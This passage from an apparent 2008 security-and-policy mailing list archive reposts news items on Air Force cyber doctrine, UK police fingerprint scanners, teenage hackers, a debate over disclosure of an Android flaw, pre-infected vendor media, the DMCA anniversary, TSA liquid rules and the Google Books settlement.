Doctrine Document 2-11," obtained by Inside Defense. ?Freedom of action... can be seen as freedom from attack and freedom to attack,? the paper states. But, it adds, ?The size and complexity of the domain and the extensive collection of networks... can make freedom of action difficult and perhaps elusive.? For years, the Air Force has been trying to ramp up its network war plans. But the service has had trouble deciding exactly what it wants those cyber battle plans to be. In 2005, the Air Force changed its mission statement to read, "As Airmen, it is our calling to dominate Air, Space, and Cyberspace." Then the service announced a far-reaching effort to set up a "Cyber Command," responsible for that dominance. But by August of this year, that project was put on hold, after it became painfully obvious that no one was really sure what the new command would really do (or even how to define the term "cyber.") Now, those network warriors will fall under the purview of Air Force Space Command. According to Inside Defense , the Air Force's new, 70-page document uses an awfully broad definition of what could be considered cyber, "touching on everything from bombs against enemy network nodes to radar-jamming aircraft, computer firewalls and fake e?mails to terrorist operatives." Even "rapid software development" and "psychological operations" are counted as components of information warfare. Such operations could include ?spoofing? enemy command and control systems to ?deceive the adversary about friendly intentions.? Airmen also could jam crucial enemy equipment under the guise of seemingly unrelated, natural events. ?Using our knowledge of space and terrestrial weather, we can mask our spoofing with ostensible natural conditions such as lightning strikes,? the document reads... If airmen know the terrorist receives instructions through the Internet, they could ?destroy, disrupt and/or exploit? the Internet link. If the terrorist?s e-mail address is known, officials could ?send him an e-mail message to influence his behavior.? Finally, if airmen know the format in which the instructions are presented, they could ?send him false taskings that look authentic,? the document reads. Sounds like a plan. From rforno at infowarrior.org Sat Oct 25 02:34:06 2008 From: rforno at infowarrior.org (Richard Forno) Date: Fri, 24 Oct 2008 22:34:06 -0400 Subject: [Infowarrior] - Center for Internet Freedom Message-ID: <9DA0FB67-5979-40A1-B1E1-7E6C2CECDDDC@infowarrior.org> Center for Internet Freedom http://www.pff.org/cif/ About the Center The mission of the Center for Internet Freedom is to advance a comprehensive market-oriented approach to Internet policy issues. Our approach minimizes government control and regulation while maximizing the freedom of the online sector to innovate, invest and grow. By offering timely analyses and critiques of Internet policy that diminish the vital role of free markets, free speech and property rights, the Center seeks to drive the Internet policy debate in new directions and counter the proliferations of advocacy groups calling for government intervention. The Center's work will include such issues as online advertising, privacy, online speech, intermediary liability, and issues affecting e- commerce, such as taxation. From rforno at infowarrior.org Sun Oct 26 20:29:37 2008 From: rforno at infowarrior.org (Richard Forno) Date: Sun, 26 Oct 2008 16:29:37 -0400 Subject: [Infowarrior] - Google Policy Fellowship Message-ID: <50369E37-FC64-4239-9BC6-EC819D0F178E@infowarrior.org> http://www.google.com/policyfellowship/ Introducing the Google Policy Fellowship As lawmakers around the world become more engaged on Internet policy, ensuring a robust and intelligent public debate around these issues becomes increasingly important. That?s why we're announcing our second summer for the Google Policy Fellowship Program?to support students and organizations working on policy issues fundamental to the future of the Internet and its users. Program Overview Fellows will have the opportunity to work at public interest organizations at the forefront of debates on broadband and access policy, content regulation, copyright and trademark reform, consumer privacy, open government, and more. Participating organizations are based in either Washington, DC, San Francisco, CA , Ottawa or Toronto, Canada and include: American Library Association, Cato Institute, Canadian Internet Policy and Public Interest Clinic, Center for Democracy and Technology, Citizen Lab, Competitive Enterprise Institute, Creative Commons, Electronic Frontier Foundation, Future of Music Coalition, Internet Education Foundation, Media Access Project, New America Foundation, Progress and Freedom Foundation, Public Knowledge, and Technology Policy Institute. More information about the host organizations and the areas of focus for the fellows are outlined here. Fellows will be assigned a lead mentor at their host organizations, but will have the opportunity to work with several senior staff members over the course of the summer. Fellows will be expected to make substantive contributions to the work of their organization, including conducting policy research and analysis; drafting reports and analyses; attending government and industry meetings and conferences; and participating in other advocacy activities. From rforno at infowarrior.org Mon Oct 27 12:45:42 2008 From: rforno at infowarrior.org (Richard Forno) Date: Mon, 27 Oct 2008 08:45:42 -0400 Subject: [Infowarrior] - UK cops w/mobile fingerprint scanners Message-ID: <88824933-BFA9-42E2-B1E0-722597483A03@infowarrior.org> Police will use new device to take fingerprints in street Civil rights campaigners say images must not be added to databases http://www.guardian.co.uk/politics/2008/oct/27/project-midas-fingerprint-scanner-liberty Every police force in the UK is to be equipped with mobile fingerprint scanners - handheld devices that allow police to carry out identity checks on people in the street. The new technology, which ultimately may be able to receive pictures of suspects, is likely to be in widespread use within 18 months. Tens of thousands of sets - as compact as BlackBerry smartphones - are expected to be distributed. The police claim the scheme, called Project Midas, will transform the speed of criminal investigations. A similar, heavier machine has been tested during limited trials with motorway patrols. To address fears about mass surveillance and random searches, the police insist fingerprints taken by the scanners will not be stored or added to databases. Liberty, the civil rights group, cautioned that the law required fingerprints taken in such circumstances to be deleted after use. Gareth Crossman, Liberty's policy director, said: "Saving time with new technology could help police performance but officers must make absolutely certain that they take fingerprints only when they suspect an individual of an offence and can't establish his identity." Details of the type of equipment and the scope of its use have been revealed in a presentation by the National Policing Improvement Agency (NPIA). The initial phase of the Mobile Identification At Scene (Midas) project, costed at ?30m-?40m, will enable officers to perform rapid checks on the fingerprints of people arrested or detained. The marks will be compared against records on Ident1, the national police database which holds information on 7.5 million individuals. Geoff Whitaker, a senior technology officer with the NPIA, told the Biometrics 2008 conference that Project Midas would save enormous amounts of police time and reduce the number of wrongful arrests. At present, officers have to take suspects to custody suites if they need to check fingerprints. On average, the agency's research shows, the procedure takes 67 minutes. "If we scaled this [saving] up to the national level that would equate to 366 additional police officers on the beat," Whitaker said. "One of the benefits is that it will reduce the number of errors - and we can reduce the number of arrests significantly. "There's a huge range of opportunities [for] mobile ID. It could be used on the deceased at the scene of a crime, on suspects for intelligence in the early part of an investigation, [or even] in a mortuary." Policing of big public occasions, sporting events, festivals, political conferences - as a well as immigration and border controls - could benefit from the equipment, he suggested. "Another use is for prisoners in transit; it's not uncommon for prisoners to swap identities on the way to prison," he said. Project Midas, he said, would give the police "a full, mobile national capability" to check identities. The system is being designed to have the capacity to beam images of suspects back to officers on the streets to help confirm identifications. Some US police forces are already using the technology. "The return of mugshots [to officers]," Whitaker added, "is something we would like to do." The tender document for Midas states: "Bidders' solutions ... should include, but may not be limited to, fingerprint identification capability." Plans for a police Facial Images National Database (Find) were suspended last year but are being reviewed. One of the companies bidding for the Midas contract, Northrop Grumman, told the Guardian: "A lot of the hand-held [devices] we are considering have cameras so they can support fingerprint and facial images". A limited trial of mobile police fingerprint devices, called Project Lantern, started in 2006. About 200 have been distributed and 30,000 checks performed. They were deployed in police cars using automatic number plate recognition technology - stopping vehicles that were logged as stolen, having no insurance, no MOT or simply unknown. "The aim was to deny criminals the use of the roads," said Whitaker. "Around 60% of drivers stopped gave false identification details." Fingerprint checks often showed they were carrying falsified documents. The electronic searches, encrypted and sent over public networks, were usually returned to the mobile devices within two minutes; 97% of searches were completed in five minutes. Responses are graded as "high" or "medium". If high, it shows the system is confident of a match; if medium, it could display up to three potential identities. The returned data includes the name, age and gender of the suspect if there is a match. A spokeswoman for the NPIA added: "It will be up to each police authority to assess the benefits and see how many they want. Early indications are that the benefits will be huge." Thomas Smith, an officer from the Los Angeles police department, also briefed the Biometrics 2008 conference on the success of his force's mobile ID devices which send images and fingerprint matches back to officers on the street. He said they had become so powerful that once the machines were produced some suspects admitted they were lying about their identity. "Our next thing will be facial recognition [computerised matching of suspects from their faces] in the field," he said. From rforno at infowarrior.org Mon Oct 27 18:20:22 2008 From: rforno at infowarrior.org (Richard Forno) Date: Mon, 27 Oct 2008 14:20:22 -0400 Subject: [Infowarrior] - Alarm raised on teenage hackers Message-ID: <1AB00F57-EB15-4A44-8FAD-428A238A23AC@infowarrior.org> (Must be a slow news day......-rf) Alarm raised on teenage hackers By Mark Ward Technology correspondent, BBC News http://newsvote.bbc.co.uk/mpapps/pagetools/print/news.bbc.co.uk/2/hi/technology/7690126.stm Increasing numbers of teenagers are starting to dabble in hi-tech crime, say experts. Computer security professionals say many net forums are populated by teenagers swapping credit card numbers, phishing kits and hacking tips. The poor technical skills of many young hackers means they are very likely to get caught and arrested, they say. Youth workers added that any teenager getting a criminal record would be putting their future at risk. Slippery slope "I see kids of 11 and 12 sharing credit card details and asking for hacks," said Chris Boyd, director of malware research at FaceTime Security. Many teenagers got into low level crime by looking for exploits and cracks for their favourite computer games. Communities and forums spring up where people start to swap malicious programs, knowledge and sometimes stolen data. Some also look for exploits and virus code that can be run against the social networking sites popular with many young people. Some then try to peddle or use the details or accounts they net in this way. Mr Boyd said he spent a lot of time tracking down the creators of many of the nuisance programs written to exploit users of social networking sites and the culprit was often a teenager. From such virus and nuisance programs, he said, many progress to outright criminal practices such as using phishing kits to create and run their own scams. "Some are quite crude, some are clever and some are stupid," he said. The teenagers' attempts to make money from their life of cyber crime usually came unstuck because of their poor technical skills. "They do not even know enough to get a simple phishing or attack tool right," said Kevin Hogan, a senior manager Symantec Security Response. "We have seen phishing sites that have broken images because the link, rather than reference the original webpage, is referencing a file on the C: drive that is not there," he said. Symantec researchers have collected many examples of teenagers who have managed to cripple their own PCs by infecting them with viruses they have written. Video choice Chris Boyd from FaceTime said many of the young criminal hackers were undermined by their desire to win recognition for their exploits. "They are obsessed with making videos of what they are doing," he said. Many post videos of what they have done to sites such as YouTube and sign on with the same alias used to hack a site, run a phishing attack or write a web exploit. Many share photos or other details of their life on other sites making it easy for computer security experts to track them down and get them shut down. Mr Boyd's action to shut down one wannabe hacker, using the name YoGangsta50, was so comprehensive that it wrung a pledge from the teenager in question to never to get involved in petty hi-tech crime again. Mathew Bevan, a reformed hacker who was arrested as a teenager and then acquitted for his online exploits, said it was no surprise that young people were indulging in online crime. "It's about the thrill and power to prove they are somebody," he said. That also explains why they stuck with an alias or online identity even though it was compromised, he added. "The aim of what they are doing is to get the fame within their peer group," he said. "They spend months or years developing who they are and their status. They do not want to give that up freely." Graham Robb, a board member of the Youth Justice Board, said teenagers needed to appreciate the risks they took by falling into hi-tech crime. "If they get a criminal record it stays with them," he said. "A Criminal Record Bureau check will throw that up and it could prevent access to jobs." Anyone arrested and charged for the most serious crimes would carry their criminal record with them throughout their life. Also, he added, young people needed to appreciate the impact of actions carried out via the net and a computer. "Are they going to be able to live with the fact that they caused harm to other people?" he said. "They do not think there is someone losing their money or their savings from what they are doing. "For a kid, getting a criminal record is the worst possible move." Story from BBC NEWS: http://news.bbc.co.uk/go/pr/fr/-/2/hi/technology/7690126.stm Published: 2008/10/27 10:26:19 GMT ? BBC MMVIII From rforno at infowarrior.org Mon Oct 27 18:21:33 2008 From: rforno at infowarrior.org (Richard Forno) Date: Mon, 27 Oct 2008 14:21:33 -0400 Subject: [Infowarrior] - Debunking Google's vuln disclosure propaganda Message-ID: Debunking Google's security vulnerability disclosure propaganda Posted by Chris Soghoian 7 comments http://news.cnet.com/8301-13739_3-10075488-46.html?part=rss&subj=news&tag=2547-1_3-0-20 Question: You're a multi-billion dollar tech giant, you've launched a new phone platform after much media fanfare. Then, a security researcher finds a flaw in your product within days of its release. Worse, the vulnerability is due to the fact that you shipped old (and known to be flawed) software on the phones. What should you do? Issue an emergency update, warn users, or perhaps even issue a recall? If you're Google, the answer is simple -- attack the researcher. With the news of a flaw in Google's Android phone platform making the New York Times on Friday, the search-giant quickly ramped up the spin machine. After first dismissing the amount of damage to which the flaw exposed users, anonymous Google executives then attempted to discredit the security researcher, Charlie Miller, a former NSA employee turned security consultant. Miller, the unnamed Googlers argued, acted irresponsibly by going to the New York Times to announce his vulnerability, instead of giving the Big G a few weeks or months to fix the flaw: Google executives said they believed that Mr. Miller had violated an unwritten code between companies and researchers that is intended to give companies time to fix problems before they are publicized. What the Googlers are talking about is the idea of "responsible disclosure," one method of disclosing security vulnerabilities in software products. While it is an approach that is frequently followed by researchers, it is not the only method available, and in spite of the wishes of the companies whose products are frequently analyzed, it is by no means the "norm" for the industry. Another frequently used method is that of "full disclosure" -- in which a researcher will post complete details of a vulnerability to a public forum (typically a mailing list dedicated to security topics). This approach is often used by researchers when they have discovered a flaw in a product made by a company with a poor track record of working with researchers -- or worse, threatening to sue them. For example, some researchers refuse to provide Apple with any advanced notification, due to its past behavior. A third method involves selling information on the vulnerabilities to third parties (such Tippingpoint and iDefense) -- who pass that information on to their own customers, or perhaps keep it for themselves. Charlie Miller, the man who discovered the Android flaw has followed this path in the past, most notably when he sold details of a flaw in the Linux Kernel to the US National Security Agency for $50,000 (pdf). Google's poor track record First, consider the fact that security is a two-sided coin. If Google wants researchers to come to it first with vulnerability information, it is only fair to expect that Google be forthcoming with the community (and the general public) once the flaw has been fixed. Google's approach in this area is that of total secrecy -- not acknowledging flaws, and certainly not notifying users that a vulnerability existed or has been fixed. Google's CIO admitted as much in a 2007 interview with the Wall Street Journal: Regarding security-flaw disclosure, Mr. Merrill says Google hasn't provided much because consumers, its primary users to date, often aren't tech-savvy enough to understand security bulletins and find them "distracting and confusing." Also, because fixes Google makes on its servers are invisible to the user, notification hasn't seemed necessary, he says. Second, companies do not have a right to expect "responsible disclosure." It is a mutual compromise, where the researchers provide the company with advanced notification in exchange for some form of assurance that the company will act reasonably, keep the lines of communication open, and give the researcher full credit once the vulnerability is fixed. Google's track record in this area leaves much to be desired. Many top tier researchers have not been credited for disclosing flaws, and in some cases, Google has repeatedly dragged its feet in fixing flaws. The end result is that many frustrated researchers have opted to follow the full disclosure path, after hitting a brick wall when trying to provide Google with advanced notice. I can personally confirm this experience, after I discovered a fairly significant flaw in a number of commercial Firefox toolbars back in 2007. While Mozilla and Yahoo replied to my initial email within a day or so, and kept the lines of communication open, Google repeatedly stonewalled me, and I didn't hear anything from them for weeks at a time. Eventually, Google fixed the flaw a day or two after I went public with the vulnerability, 45 days after I had originally given the company private notice. As a result, I have extreme sympathy for those in the research community who have written Google off. A rather unimpressive vulnerability Once we actually look into the details of the vulnerability, and Miller's disclosure, the situation looks even worse for Google. A known vulnerability: The Android platform is built on top of over 80 open source libraries and programs. This particular flaw had been known about for some time and already fixed in the current version of the open source libraries. The flaw in Google's product only exists because the company shipped out-of-date software, which was known to be vulnerable. Advanced notice: While the anonymous Google executives criticized Miller for not following responsible disclosure practices, it is worth noting that the researcher did provide Google with early notice -- informing the company on the 20th of October. It is also important to note that Miller and his colleagues have yet to actually provide full information on the vulnerability or a working proof of concept exploit to the security community. Thus, it can hardly be said that Miller followed the full disclosure path. If Google can criticize Miller at all, it cannot be for not warning the company, but perhaps for not providing them with enough warning. However, given that Google shipped known-vulnerable software to hundreds of thousands of users, and that fixed versions of the vulnerable software packages have been available for some time, it is difficult for this blogger to sympathize with the poor folks at Mountain View. Furthermore, given Mr. Miller's previous mercenaryish history of selling software vulnerabilities to the National Security Agency (which presumably used the flaws to break into foreign government computers, and not in order to fix the vulnerable software), we should be happy that he is at least now sharing the existence of this flaw with the public. At least this way, developers have a good chance of finding and fixing it. Disclosure: In the summer of 2006, I worked as an intern for the Application Security Team at Google. Furthermore between 2003-2005, I was a student at Johns Hopkins University, and advised by Prof. Avi Rubin, who is one of the founders of Independent Security Evaluators, the company that employs Charlie Miller. A couple of my former colleagues also now work for ISE. I have not spoken with them (or anyone at Google) about this article. Christopher Soghoian delves into the areas of security, privacy, technology policy and cyber-law. He is a student fellow at Harvard University's Berkman Center for Internet and Society , and is a PhD candidate at Indiana University's School of Informatics. His academic work and contact information can be found by visiting www.dubfire.net/chris/ . He is a member of the CNET Blog Network, and is not an employee of CNET. Disclosure. From rforno at infowarrior.org Tue Oct 28 02:53:19 2008 From: rforno at infowarrior.org (Richard Forno) Date: Mon, 27 Oct 2008 22:53:19 -0400 Subject: [Infowarrior] - German police seek speeding British Muppet Message-ID: <90051487-8EBE-4CD1-976A-1FB7CFAA23B5@infowarrior.org> (pics @ the link, too) German police seek speeding British Muppet http://arbroath.blogspot.com/2008/10/german-police-seek-speeding-british.html German traffic police have been left looking like proper muppets by a British prankster. An Audi TT with British registration plates has been repeatedly caught speeding on roads in the Bavarian city of Bayreuth. But because continental speed cameras are set up for left- hand drive vehicles, the cameras keep missing the driver?s face. Instead, they keep capturing clear views of a manic Muppet-like toy which the cheeky Brit has propped up on his passenger seat. But police admit they are even baffled about the identity of the muppet. The No.1 suspect is Animal ? the manic drummer from The Muppet Show?s house band The Electric Mayhem. But several residents of Sesame Street are also in the frame, including the lovable monster Grover and Bert?s rubber-ducky-loving sidekick Ernie. Now police have released one of the photographs in the hope someone will recognise the furry speed demon. A German police source said: ?The number plate is not enough. We need clear evidence of who is driving the vehicle too. ?But because this is a British vehicle we can never get a decent picture. The driver has obviously worked this out because he has placed a large puppet in the passenger seat. ?This may be an example of the famous British sense of humour but it is still dangerous driving. The driver has been caught on camera on several occasions and the puppet is on the passenger seat every time. We suspect he positions the toy deliberately before accelerating past the camera.? From rforno at infowarrior.org Tue Oct 28 06:15:43 2008 From: rforno at infowarrior.org (Richard Forno) Date: Tue, 28 Oct 2008 02:15:43 -0400 Subject: [Infowarrior] - Vendor FAIL - Certified Pre-Owned (CPO) Message-ID: <28D57FAB-279F-4264-81CF-C4263797EB73@infowarrior.org> http://attrition.org/errata/cpo/ Vendor FAIL - Certified Pre-Owned (CPO) How vendors screw up their own products and leave YOU holding the virtual bag Certified Pre-0wned For reasons unknown, vendors occasionally fail to maintain quality control over the media they ship. Whether it is CD-ROM, DVD, USB or some other form of media, it may contain viruses, trojans or even drug-runner music. When this happens, the software you receive obviously can't be trusted in any fashion, and installing software from already compromised media immediately puts your system's integrity in question. This page serves to keep a record of such incidents and remind vendors that shipping "pre-0wned" software is deplorable. This list is designed to capture consumer related exposures, specifically malware or other items of interest. This list will not include incidents of vendors shipping vulnerable software as that list would be extensive. In addition, it will not track targeted malware attacks against specific targets, such as the "Farewell Dossier". For an interesting historical perspective of such incidents until 1996, consult McDonald's list. Some of these incidents are integrated in the CPO list depending on the information available. [..] This list is not complete, yet it should make you realize that nothing is safe. Every piece of electronics you buy and every piece of software you install may come with malware pre-installed. Rather than manufacturers introducing a higher set of quality controls to prevent such incidents, we will no doubt see companies produce new products that will help keep you "safe" from such threats. These "controls" would no-doubt be another bandaid on top of bandaids that make up a lucrative market, which is sad commentary about how customers perceive and receive "electronic security". http://attrition.org/errata/cpo/ From rforno at infowarrior.org Tue Oct 28 15:47:29 2008 From: rforno at infowarrior.org (Richard Forno) Date: Tue, 28 Oct 2008 11:47:29 -0400 Subject: [Infowarrior] - Citizen Journalists Protecting the 2008 Election Message-ID: Citizen Journalists Protecting the 2008 Election Topics: citizen journalism | politics | Election 2008 Source: New York Times, October 27, 2008 The New York Times notes, "There are at least two wikis intended to let voters collaborate to collect examples of problems with voting, whether exceptionally long lines or more direct actions meant to scare off voters -- the Voter Suppression Wiki and SourceWatch's Election Protection Wiki. Since 2006, the Video the Vote project has sent out volunteers to monitor voting around the country, and this year the group expects to dispatch at least 2,300 volunteers with cameras in all 50 states to videotape potential trouble spots. ... The ultimate home for much of this content could be the video-sharing giant YouTube, which has created a channel, Video Your Vote, in collaboration with PBS, to encourage submissions. ... While his organization is partnering with YouTube (and received 300 cameras as part of the Video Your Vote project), [project founder Ian] Inaba says he sees their missions as different. 'YouTube is there to generate content, to generate eyeballs,' he said. 'We came at this from more of an election protection framework. We want voters to oversee the election process - it requires citizen oversight.'" http://www.prwatch.org/node/7869 From rforno at infowarrior.org Tue Oct 28 15:50:44 2008 From: rforno at infowarrior.org (Richard Forno) Date: Tue, 28 Oct 2008 11:50:44 -0400 Subject: [Infowarrior] - Student charged after alerting principal to server hack Message-ID: <00B3F43F-2F74-4E0C-A7DA-19E67159D4E9@infowarrior.org> Student charged after alerting principal to server hack 'Intentional criminal act'? By Dan Goodin in San Francisco ? Get more from this author Posted in Crime, 28th October 2008 00:38 GMT http://www.theregister.co.uk/2008/10/28/student_charged/ A 15-year-old high school student in New York State has been charged with three felonies after he allegedly accessed personnel records on his school's poorly configured computer network and then notified his principal of the security weakness. The unnamed student of Shenendehowa Central School was charged Thursday with computer trespass, unlawful possession of a personal identification information and identity theft, according to news reports. He has been suspended from school and ordered to stand charges in family court in Saratoga County. He and a peer allegedly gained access to a file containing the personal information of 250 workers because of a district-wide error in setting up a new server. After accessing the information, he sent an email alerting the principal to the breach and signed it "A student." With the help of the district's IT department, the principal identified the boy as the culprit. "The kid committed an intentional criminal act," state trooper Maureen Tuffey told The Times Union. "He deceitfully used someone else's name and password so he would not get caught and was looking to profit from his criminal act." All that was needed to access the information was a district password. School officials have admitted that thousands of students, faculty and employees could have accessed the same file for up to two weeks. The file contained the social security numbers, driver's license numbers and home addresses of past and present employees, most of whom were bus drivers. Since news of the charges were reported late last week, hackers have criticized administrators for turning the student into a scapegoat for the school board's shoddy computer security. We're inclined to agree, although it'd be nice if we knew more about the specifics of the email the fellow sent his principal. Additional coverage is available here and here. ? From rforno at infowarrior.org Tue Oct 28 20:12:06 2008 From: rforno at infowarrior.org (Richard Forno) Date: Tue, 28 Oct 2008 16:12:06 -0400 Subject: [Infowarrior] - DMCA turns 10 today Message-ID: If you're wondering whom to thank for the Web 2.0 explosion in interactive websites, consider sending a bouquet to Congress. Today's internet is largely an outgrowth of the much-reviled Digital Millennium Copyright Act that lawmakers passed in 1998, and President Clinton signed into law exactly a decade ago Tuesday. < - > http://blog.wired.com/27bstroke6/2008/10/ten-years-later.html From rforno at infowarrior.org Tue Oct 28 22:45:02 2008 From: rforno at infowarrior.org (Richard Forno) Date: Tue, 28 Oct 2008 18:45:02 -0400 Subject: [Infowarrior] - EFF: 10 years of DMCA (Report) Message-ID: October 27th, 2008 EFF Marks 10th Anniversary of DMCA with Report on Law's Unintended Consequences Ten-Year Legacy of Harm to Fair Use, Free Speech http://www.eff.org/press/archives/2008/10/27 San Francisco - Ten years ago Tuesday, the Digital Millennium Copyright Act (DMCA) was signed into law. In a report released to mark the anniversary, the Electronic Frontier Foundation (EFF) documents the ways in which this controversial law has harmed fair use, free speech, scientific research, and legitimate competition. "Unintended Consequences: Ten Years Under the DMCA" focuses on the most notorious aspect of the law: its ban on "circumventing" digital rights management (DRM) and "other technical protection measures." Instead of protecting against copyright infringement, this ban has routinely been used to stymie consumers, scientists, and small businesses. "Unintended Consequences" collects reports of the law's most egregious abuses over the last decade. In 2003, for example, Lexmark used the DMCA to block distribution of chips that allow the refilling of laser toner cartridges. In 2006, computer security researchers at Princeton delayed disclosure of a dangerous hidden program in some Sony CDs based on fears of DMCA liability. Meanwhile, the DMCA has not prevented digital piracy. DRM systems are consistently and routinely broken almost immediately upon their introduction. "Over the last ten years, the DMCA has done far more harm to fair use, free speech, scientific research, and competition than it has to digital piracy. Measured from the perspective of the public, it's been a decade of costs, with no benefits," said EFF Senior Intellectual Property Attorney Fred von Lohmann. "The music industry has given up on DRM, and Hollywood now relies on DRM principally to stop innovation that it doesn't like. It's time for Congress to consider giving up on this failed experiment to back up DRM systems with misguided laws." For "Unintended Consequences: Ten Years Under the DMCA": http://www.eff.org/wp/unintended-consequences-ten-years-under-dmca For more on the DMCA: http://www.eff.org/issues/dmca Contact: Fred von Lohmann Senior Intellectual Property Attorney Electronic Frontier Foundation fred at eff.org From rforno at infowarrior.org Tue Oct 28 22:45:56 2008 From: rforno at infowarrior.org (Richard Forno) Date: Tue, 28 Oct 2008 18:45:56 -0400 Subject: [Infowarrior] - TSA vows relaxation of carry-on liquid limits Message-ID: <0DAA2DB2-0E55-4725-AC1A-9673BEA3EEF2@infowarrior.org> TSA vows relaxation of carry-on liquid limits http://www.theregister.co.uk/2008/10/28/liquid_restrictions_lifted/ Pulling the curtain on 'security theater' By Dan Goodin in San Francisco ? Get more from this author Posted in Security, 28th October 2008 20:26 GMT Airline passengers on both sides of the Atlantic could be free to carry larger bottles of liquids in carry-on luggage under a two-year plan to relax current security rules that sharply restrict the amount of shampoo, hand lotion, and other types of liquids that can be brought in a plane cabin. Under an oft-criticized plan implemented a few years ago, liquids must be stored in containers no bigger than three ounces. Those containers, in turn, must be stowed in a clear, zip-locked bag no bigger than one quart, and each passenger is limited to bringing a single bag in carry- on luggage. Critics have referred to the highly inconvenient restrictions as "security theater," saying they do little to actually prevent terrorists from smuggling explosives onto planes. The US Transportation Security Administration (TSA) wants you to know it feels your pain and is taking steps to end it. Under a plan outlined here, an official said size restrictions will be removed by the end of 2009, although liquids will still have to placed in a separate bin when passing through security checkpoints. By the end of 2010, there will be no restrictions. "We are deploying the best technology and training as fast as we can get it," the official wrote. "The goal is to remove all the restrictions on liquids when we have automated systems that can accurately separate threat from non-threat liquids." The TSA is working with its counterparts in Europe, Canada, and Australia to design "common design standards" to ensure the new policy is in harmony with those in other countries. Enabling the change, the TSA official wrote, is new screening technologies that can tell the difference between hair gel and liquid explosives. The TSA is in the process of installing advanced technology X-ray machines throughout the country. The new machines should be in place by the end of 2009, but it will take an additional year for them to be outfitted with software that can identify threatening liquids. Computed tomography scanners, explosives trace detection equipment, and spectrometers are also being deployed in increasing numbers to ferret out threatening liquids. ? From rforno at infowarrior.org Wed Oct 29 13:28:16 2008 From: rforno at infowarrior.org (Richard Forno) Date: Wed, 29 Oct 2008 09:28:16 -0400 Subject: [Infowarrior] - Authors, Publishers, and Google Reach Landmark Settlement Message-ID: Authors, Publishers, and Google Reach Landmark Settlement Copyright Accord Would Make Millions More Books Available Online http://www.google.com/intl/en/press/pressrel/20081027_booksearchagreement.html NEW YORK, NY (October 28, 2008) ? The Authors Guild, the Association of American Publishers (AAP), and Google today announced a groundbreaking settlement agreement on behalf of a broad class of authors and publishers worldwide that would expand online access to millions of in-copyright books and other written materials in the U.S. from the collections of a number of major U.S. libraries participating in Google Book Search. The agreement, reached after two years of negotiations, would resolve a class-action lawsuit brought by book authors and the Authors Guild, as well as a separate lawsuit filed by five large publishers as representatives of the AAP?s membership. The class action is subject to approval by the U.S. District Court for the Southern District of New York. The agreement promises to benefit readers and researchers, and enhance the ability of authors and publishers to distribute their content in digital form, by significantly expanding online access to works through Google Book Search, an ambitious effort to make millions of books searchable via the Web. The agreement acknowledges the rights and interests of copyright owners, provides an efficient means for them to control how their intellectual property is accessed online and enables them to receive compensation for online access to their works. If approved by the court, the agreement would provide: * More Access to Out-of-Print Books ? Generating greater exposure for millions of in-copyright works, including hard-to-find out-of- print books, by enabling readers in the U.S. to search these works and preview them online; * Additional Ways to Purchase Copyrighted Books ? Building off publishers? and authors? current efforts and further expanding the electronic market for copyrighted books in the U.S., by offering users the ability to purchase online access to many in-copyright books; * Institutional Subscriptions to Millions of Books Online ? Offering a means for U.S. colleges, universities and other organizations to obtain subscriptions for online access to collections from some of the world?s most renowned libraries; * Free Access From U.S. Libraries ? Providing free, full-text, online viewing of millions of out-of-print books at designated computers in U.S. public and university libraries; and * Compensation to Authors and Publishers and Control Over Access to Their Works ? Distributing payments earned from online access provided by Google and, prospectively, from similar programs that may be established by other providers, through a newly created independent, not-for-profit Book Rights Registry that will also locate rightsholders, collect and maintain accurate rightsholder information, and provide a way for rightsholders to request inclusion in or exclusion from the project. Under the agreement, Google will make payments totaling $125 million. The money will be used to establish the Book Rights Registry, to resolve existing claims by authors and publishers and to cover legal fees. The settlement agreement resolves Authors Guild v. Google, a class-action suit filed on September 20, 2005 by the Authors Guild and certain authors, and a suit filed on October 19, 2005 by five major publisher-members of the Association of American Publishers: The McGraw-Hill Companies, Inc. (NYSE: MHP); Pearson Education, Inc. and Penguin Group (USA) Inc., both part of Pearson (LSE: PSON; NYSE: PSO); John Wiley & Sons, Inc. (NYSE: JWa and JWb); and Simon & Schuster, Inc. part of CBS Corporation (NYSE: CBS.A and CBS). These lawsuits challenged Google?s plan to digitize, search and show snippets of in- copyright books and to share digital copies with libraries without the explicit permission of the copyright owner. Holders worldwide of U.S. copyrights can register their works with the Book Rights Registry and receive compensation from institutional subscriptions, book sales, ad revenues and other possible revenue models, as well as a cash payment if their works have already been digitized. Libraries at the Universities of California, Michigan, Wisconsin, and Stanford have provided input into the settlement and expect to participate in the project, including by making their collections available. Along with a number of other U.S. libraries that currently work with Google, their significant efforts to preserve, maintain and provide access to books have played a critical role in achieving this agreement and, through their anticipated participation, they are furthering such efforts while making books even more accessible to students, researchers and readers in the U.S. It is expected that additional libraries in the U.S. will participate in this project in the future. Google Book Search users in the United States will be able to enjoy and purchase the products and services offered under the project. Outside the United States, the users? experience with Google Book Search will be unchanged, unless the offering of such products and services is authorized by the rightsholder of a book. ?It?s hard work writing a book, and even harder work getting paid for it,? said Roy Blount Jr., President of the Authors Guild. ?As a reader and researcher, I?ll be delighted to stop by my local library to browse the stacks of some of the world?s great libraries. As an author, well, we appreciate payment when people use our work. This deal makes good sense.? ?This historic settlement is a win for everyone,? said Richard Sarnoff, Chairman of the Association of American Publishers. ?From our perspective, the agreement creates an innovative framework for the use of copyrighted material in a rapidly digitizing world, serves readers by enabling broader access to a huge trove of hard-to-find books, and benefits the publishing community by establishing an attractive commercial model that offers both control and choice to the rightsholder.? ?Google's mission is to organize the world's information and make it universally accessible and useful. Today, together with the authors, publishers, and libraries, we have been able to make a great leap in this endeavor,? said Sergey Brin, co-founder & president of technology at Google. ?While this agreement is a real win-win for all of us, the real victors are all the readers. The tremendous wealth of knowledge that lies within the books of the world will now be at their fingertips.? For more information about this agreement, including information about whether you may be a class member, please visit http://books.google.com/booksrightsholders . Class members include authors (the Author Sub-Class) and publishers (the Publisher Sub-Class), and their heirs and successors, of books and other written works protected by U.S. copyright law. A teleconference for the media will be held today, Tuesday, October 28, 2008, at 10:30 a.m. Eastern. To participate, reporters in the U.S. should dial 877-340-7913, and reporters internationally should dial 719-325-4845. Please tell the operator you would like to join the ?Authors, Publishers and Google? call. About the Authors Guild The Authors Guild, representing more than 8,000 authors, is the nation's largest and oldest society of published authors and the leading writers' advocate for fair compensation, effective copyright protection, and free expression. For more information, visit www.authorsguild.org . About the Association of American Publishers The AAP is the national trade association of the U.S. book publishing industry. AAP?s more than 300 members include most of the major commercial publishers in the United States, as well as smaller and non- profit publishers, university presses and scholarly societies. AAP members publish hardcover and paperback books in every field, educational materials for the elementary, secondary, postsecondary, and professional markets, scholarly journals, computer software, 